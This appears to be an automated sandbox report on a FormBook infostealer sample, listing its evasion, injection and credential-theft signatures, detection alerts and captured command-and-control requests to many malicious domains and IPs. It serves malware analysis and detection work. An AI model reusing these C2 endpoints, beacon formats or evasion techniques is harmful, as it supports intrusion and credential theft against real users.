Windows Analysis Report
BE.exe

Overview

General Information

Sample name: BE.exe
Analysis ID: 1436122
MD5: 2b5917ada9ef1cef3713977421874f68
SHA1: fb74e9a12166950199edc891c59bea4069edcd1c
SHA256: 8fd32227ca310727137c28a5945497447ab479bd074d064ee11a6545d5eef5d6
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: http://www.5597043.com/nrup/?4zB=2at1c1MHk4LdsVUEU7ldBtKGEgzqeGLnTyG93G2uP4ilKgyCyFz2asP5AaTCMTK+FwXayJ+KsNmilZED2txklDFoTdNS5Ym8YrIOtvEOZYMpOqGqSE/eXVAT3OGK9XHhpGGp26Q=&E4=mL5lCZwhnX Avira URL Cloud: Label: malware
Source: http://www.hggg2qyws.sbs/nrup/ Avira URL Cloud: Label: malware
Source: http://www.hggg2qyws.sbs/nrup/?4zB=cxIeN1iVhQqOwso3qyh3afqsjymHjIXfdqpS9UswCbkbA/58Vi1sm+p80ycRzZQ3wyr0SPrfaOIY33X3gObGEgshGKYe9SriGy0z6CPVUFDac+zMNq37Dmd0gl4JqD8C9xqTvhA=&E4=mL5lCZwhnX Avira URL Cloud: Label: malware
Source: http://www.5597043.com/nrup/ Avira URL Cloud: Label: malware
Source: BE.exe Virustotal: Detection: 38% Perma Link
Source: BE.exe ReversingLabs: Detection: 55%
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.4526747415.0000000005270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4522537539.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2260683623.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4524080493.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2260393670.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4524196683.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2261145048.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4524061386.0000000004690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: BE.exe Joe Sandbox ML: detected
Source: BE.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: firefox.pdbP source: finger.exe, 00000004.00000003.2500796329.0000000007AFC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: finger.pdb source: svchost.exe, 00000002.00000002.2260567408.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2260582343.0000000003212000.00000004.00000020.00020000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000002.4523226545.0000000001588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000000.2148577940.00000000003AE000.00000002.00000001.01000000.00000004.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000000.2328613444.00000000003AE000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: BE.exe, 00000000.00000003.2066153968.0000000003670000.00000004.00001000.00020000.00000000.sdmp, BE.exe, 00000000.00000003.2067199286.0000000003860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2116156273.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2260716338.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2260716338.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2114386339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.4524439951.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2263992743.0000000002A97000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.4524439951.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2260870045.0000000000811000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: BE.exe, 00000000.00000003.2066153968.0000000003670000.00000004.00001000.00020000.00000000.sdmp, BE.exe, 00000000.00000003.2067199286.0000000003860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2116156273.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2260716338.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2260716338.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2114386339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, finger.exe, finger.exe, 00000004.00000002.4524439951.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2263992743.0000000002A97000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.4524439951.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2260870045.0000000000811000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: finger.exe, 00000004.00000002.4525309723.000000000326C000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000004.00000002.4522971094.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000000.2329203520.0000000002E3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2500853283.000000001422C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: finger.exe, 00000004.00000002.4525309723.000000000326C000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000004.00000002.4522971094.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000008.00000000.2329203520.0000000002E3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2500853283.000000001422C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: firefox.pdb source: finger.exe, 00000004.00000003.2500796329.0000000007AFC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000003.2449992527.00000000074E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: finger.pdbGCTL source: svchost.exe, 00000002.00000002.2260567408.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2260582343.0000000003212000.00000004.00000020.00020000.00000000.sdmp, mjUxxQvdYhZcUTbGlnDuL.exe, 00000003.00000002.4523226545.0000000001588000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_003EDBBE
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003BC2A2 FindFirstFileExW, 0_2_003BC2A2
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F68EE FindFirstFileW,FindClose, 0_2_003F68EE
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_003F698F
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_003ED076
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_003ED3A9
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_003F9642
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_003F979D
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_003F9B2B
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003F5C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_003F5C97
Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_0043D0D0 FindFirstFileW,FindNextFileW,FindClose, 4_2_0043D0D0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4x nop then xor eax, eax 4_2_0042ADB0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4x nop then pop edi 4_2_00432EB0
Source: C:\Windows\SysWOW64\finger.exe Code function: 4x nop then pop edi 4_2_00432EAF
Source: C:\Windows\SysWOW64\finger.exe Code function: 4x nop then pop edi 4_2_004333B7

Networking

barindex
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49706 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49707 -> 47.238.226.135:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49708 -> 47.238.226.135:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49710 -> 47.238.226.135:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49712 -> 162.255.119.150:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49713 -> 162.255.119.150:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49715 -> 162.255.119.150:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49716 -> 66.96.162.142:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49717 -> 66.96.162.142:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49720 -> 66.96.162.142:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49721 -> 192.185.225.30:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49722 -> 192.185.225.30:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49724 -> 192.185.225.30:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49725 -> 203.161.62.199:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49726 -> 203.161.62.199:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49728 -> 203.161.62.199:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49729 -> 217.26.48.101:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49730 -> 217.26.48.101:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49732 -> 217.26.48.101:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49733 -> 46.28.105.2:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49734 -> 46.28.105.2:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49736 -> 46.28.105.2:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49737 -> 162.240.81.18:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49738 -> 162.240.81.18:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49740 -> 162.240.81.18:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49741 -> 91.195.240.94:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49742 -> 91.195.240.94:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49744 -> 91.195.240.94:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49745 -> 46.242.239.47:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49746 -> 46.242.239.47:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49748 -> 46.242.239.47:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49752 -> 208.91.197.27:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49753 -> 172.67.145.66:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49754 -> 172.67.145.66:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49756 -> 172.67.145.66:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49757 -> 172.67.131.93:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49758 -> 172.67.131.93:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49760 -> 172.67.131.93:80
Source: DNS query: www.eh28mf3cdv.xyz
Source: Joe Sandbox View IP Address: 192.185.225.30 192.185.225.30
Source: Joe Sandbox View IP Address: 162.240.81.18 162.240.81.18
Source: Joe Sandbox View IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View ASN Name: HOMEPL-ASPL HOMEPL-ASPL
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\BE.exe Code function: 0_2_003FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 0_2_003FCE44
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=a+HLDFsiIkHuV4rn+gi5rsotYCX3prWMO9xbFOtVeNEzn7JMPDdWPqWyvrOReB4/XTuVmtp3VnCvPO8MCLmbCPyWTQaoVCzAm8BOGyiHZqCCSQPZX+grn8/y5VBeIny6Q7Ksroc=&E4=mL5lCZwhnX HTTP/1.1Host: www.thechurchinkaty.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=cxIeN1iVhQqOwso3qyh3afqsjymHjIXfdqpS9UswCbkbA/58Vi1sm+p80ycRzZQ3wyr0SPrfaOIY33X3gObGEgshGKYe9SriGy0z6CPVUFDac+zMNq37Dmd0gl4JqD8C9xqTvhA=&E4=mL5lCZwhnX HTTP/1.1Host: www.hggg2qyws.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=aN7x9cBVxwix9wZ24XKnp02DSufHFhw/orbHVM7uweNeZbe3aghpZ46wHwFUV/sydBj8rADN805v00PDoFlvXFUra5D5qxZGjmf2w10JWvUNcvN3k6vcsZaPmK+/ymPRsBgKXm4=&E4=mL5lCZwhnX HTTP/1.1Host: www.297tamatest1kb.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=rSdoiViGYDYLrRKdMyHGmEsrD5O2dR0rBzK7mFXa25NHqewciJOPgwBtfxfGP4wRjyyyhUkHMzPABqGifAtUAP3JPEm7qheA9XvzANxM3e958jhsRDqrjDbyoEoYrKWnOm7f8wg=&E4=mL5lCZwhnX HTTP/1.1Host: www.quirkyquotients.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=i3HAzC/U9OJxIpd4ZFE61YQ3tTjHAL+S67PrGCHTQB0skmoYQlANd9KUV9Q5JBr9nmo5zLmqMM+UGTcdqDZY6bty5y8oC86dSXLZSbEv4AYydQS0u4ITiyiPHi6hZSaRELyYPnw=&E4=mL5lCZwhnX HTTP/1.1Host: www.zopter.devAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=SizHnN/9xgcqSIkW0NZvl7gyOxH20BZ/0t0LsappuxDuweYFtCvxeO53HOaQyRIbafE/EtAb6ZPlU84V9ptZ1Jny3q6qBTQyh900ljmAne3h0OsFBB09soOZZqhxwkbIClKVv7o=&E4=mL5lCZwhnX HTTP/1.1Host: www.gudvain.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=QRCJemSun6KfUPjc1ra1p0KD1DfNQWayr2LzNdaeeYxuOQk1p7mHgMDWyXNbqqPBLxuVlq/ZBm0Oma1g/sQvYwOD4miMjYPxgCNdvCuM/bvV/UvzeqGcXCXks33B8x4qhMHiVpA=&E4=mL5lCZwhnX HTTP/1.1Host: www.nimaster.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=3O5z/vVa1aiBIg/xxVUxONkRy0clKD44MhhTC4igeHW13Qm1DZfD61e1zUoBYKe6btEt/czcNwG19z5y+5X/1/hH+2bFzZ870voW6rcohYnXcgzlwkBQj3Z3EfrZ/COvHm1g32k=&E4=mL5lCZwhnX HTTP/1.1Host: www.deniztemiz.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=dWrD1PFadq7V5KkU7LJ42aAFaLe4dulu4bG3e9Abb7XIEj/TR5WidBzHl5Crj+jPOsSaqiQVqCgntzF+MJy+oot/yT776gG7my4wD72kf8G6IhzmdCzOQoXZHw+LgxKFftSdLF8=&E4=mL5lCZwhnX HTTP/1.1Host: www.agoraeubebo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=2at1c1MHk4LdsVUEU7ldBtKGEgzqeGLnTyG93G2uP4ilKgyCyFz2asP5AaTCMTK+FwXayJ+KsNmilZED2txklDFoTdNS5Ym8YrIOtvEOZYMpOqGqSE/eXVAT3OGK9XHhpGGp26Q=&E4=mL5lCZwhnX HTTP/1.1Host: www.5597043.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=cS0qtSAcX+pXbswCZ3zAHmB/Q/MHrKwsBUXhui9hTGS1u1fOXkoxNKS6rQ+eLLVB4nR1GYwQqdn4Z8GMIDdK+7ND2UvcrP7jQ+gJGXZsckM16e5TaCBYb5oSYEJtHveTNZggks8=&E4=mL5lCZwhnX HTTP/1.1Host: www.domprojekt.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=ggwUi3NE8XPYfrE1AZmV8G23/8Nald6GpDeyMd0GysDSfOPZ1SBHkYiZm/pr9CpUEANarf0N1htjKEsZ+sH/TLJzRRlkG9vzqqhmtn1JCO8dwDHqj+tsiq393MrkEmli9n5cktA=&E4=mL5lCZwhnX HTTP/1.1Host: www.northeastcol0r.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=kzrlZ2T9Vt9w6xD5OjL89g1fHoSFoRZWAwja/KbUtVmCMoB2+UC4SxnLGcP1NiN5dQ0PuJ1cEwvak2ooM6DpshgnptKCHbUIhiWFqqUHKJpCyFmwiiDWuuU8YdUMVDfD6X7y8X0=&E4=mL5lCZwhnX HTTP/1.1Host: www.rtp7winbet.oneAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic HTTP traffic detected: GET /nrup/?4zB=VL9Zs38GJPfFaE6WM3J2DDHYpAc2VPFvT1CfgJidINT/bL3xtTnXNHZHm0n+ibwOL0yfM3AnXSzCgI8y/4Mb5Sh/J7VRy4Dt719Fp/6uDabdidV4BfufcLcTDbBNt2HLOtFT6ig=&E4=mL5lCZwhnX HTTP/1.1Host: www.eh28mf3cdv.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic DNS traffic detected: DNS query: www.thechurchinkaty.com
Source: global traffic DNS traffic detected: DNS query: www.hggg2qyws.sbs
Source: global traffic DNS traffic detected: DNS query: www.297tamatest1kb.com
Source: global traffic DNS traffic detected: DNS query: www.quirkyquotients.online
Source: global traffic DNS traffic detected: DNS query: www.zopter.dev
Source: global traffic DNS traffic detected: DNS query: www.gudvain.top
Source: global traffic DNS traffic detected: DNS query: www.nimaster.com
Source: global traffic DNS traffic detected: DNS query: www.deniztemiz.fun
Source: global traffic DNS traffic detected: DNS query: www.agoraeubebo.com
Source: global traffic DNS traffic detected: DNS query: www.5597043.com
Source: global traffic DNS traffic detected: DNS query: www.domprojekt.pro
Source: global traffic DNS traffic detected: DNS query: www.northeastcol0r.com
Source: global traffic DNS traffic detected: DNS query: www.rtp7winbet.one
Source: global traffic DNS traffic detected: DNS query: www.eh28mf3cdv.xyz
Source: global traffic DNS traffic detected: DNS query: www.inform-you.com
Source: global traffic DNS traffic detected: DNS query: www.berkahmadanicenter.com
